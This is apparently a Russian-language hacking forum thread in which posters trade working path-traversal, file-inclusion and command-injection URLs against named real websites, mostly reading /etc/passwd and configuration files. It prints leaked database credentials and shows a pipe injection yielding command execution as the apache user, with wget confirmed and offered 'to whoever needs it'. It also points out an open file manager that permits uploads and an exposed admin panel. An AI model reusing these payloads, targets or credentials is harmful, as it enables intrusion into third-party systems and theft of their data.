PHP Иньекции

Code:

http://www.dentalhealth.org.uk/index.php?w=../../../../../../etc/passwd%00

Code:

http://cartxpress.info/catalog/filemanager.php?file=../../../../../../../../etc/passwd

 

ещё одна

Code:

http://vitzrotech.com/english/ourproducts/mcb/link.php?file=../../../../../../../../../../etc/passwd

 

Юзайте кто хотите

1)

Code:

http://www.veryhealthylife.com/page.php?url=../../../../../../../../../../etc/passwd

2)

Code:

http://jirisubrt.com/page.php?url=page.php

открываем сами себя и смотрим в сурцах.

PHP:

<?$file=fopen ($url, "r");
      FPassThru ($file);
    ?>

по сути стандартная читалка
3)

Code:

http://www.cpm5000.com/cmnt/download.php?url=../../../../../../../../../etc/passwd&filename=fuck

сохраняем потом открываем и любуемся

 

вот)

 

мне понравились инклуды) так что проверте и направте меня на правильный путь )

 

От миня

Code:

http://fleaket.com/index.pl?page=../../../../../../../etc/passwd

читаем passwd

Резуляьтат Смотрим в сурсах

 

Code:

http://www.legalgroup.ru/tmp.php?mf=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

 

случайно нашел, когда ковырял скули)) не крутил - так что грызите =)

 

Mil.ru
Министерство обороны Российской Федерации

тссс))

 

параметр нужно в base64 перевести...

данные от мускуля

$host = "localhost";
$username ="root";
$databasename ="dtjnvudb";
$password = "DBManager";

 

Прошу прощения... Тут можно без проблем все до конца дрвести(до выполнеия кода), уж так решил, посмотреть и довести до ума то, что не довел раньше.
Движлан на перле
читаем index.pl

Code:

http://fleaket.com/index.pl?page=index.pl

из содержания можно понять.

Его болезнь

Code:

if (open(PAGE, $page))

стоит проверка на наличие файла.
Стандартная связка |id| не прокатит
Там еще есть один момент, но слишком в подробности вдаваться не буду сразу к делу. Эксплуатируется баг следующим образом.

Code:

http://fleaket.com/index.pl?page=/|id|

]
просто получаем выполнение кода.
uid=48(apache) gid=48(apache) groups=48(apache)

Code:

http://fleaket.com/index.pl?page=/|which%20wget|

/usr/bin/wget

Вроди как робит вгет, кому надо забирайте.

Еще из исходника понял, что продукт называется
PhoneBox

 

уязвимость OsCommerce/вывод файлов.
вот конфиг с паролями отмайскула. кому надо, юзайте )
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
таким образом можно и почитать /etc/passwd, но это уже думайте сами )

___
Спс скажи ++!

 

Хотя ладно, пользуйтесь на здоровье:
http://bergfolk.de/buy/extras/update.php?read_me=0&readme_file=../../../../../../etc/passwd

 

Десяток. PR разношерстный.

 

Edu

windows

 

http://www.turnir.ro/?locatie=/../../../../../../../../../../../../../../../../../etc/passwd

 

edu
есть пхпмайадмин))

 

Code:

http://altronix.securesites.net/index.php?pid=2&page_link=../../../../etc/passwd

Code:

http://editiere.de/demo/edit/filemanager.php?cdir=../../../www.editiere.de/

А вот это вообще веселье, вижу такое впервые, компания предоставляет хостинг и вот такое есть на сайте =) натолкнулся вообще случайно... =) В нем можно так же загружать файлы=)

 

GAV-GAV =)

 

gpec.ubc.ca PR5

Code:

http://www.gpec.ubc.ca/index.php?content=../../../etc/passwd

Админка:

Code:

http://www.gpec.ubc.ca/admin/

C basic авторизацией =)
Ну админка лысая =) ее можно посмотреть вот так:

Code:

http://www.gpec.ubc.ca/index.php?content=admin/index.php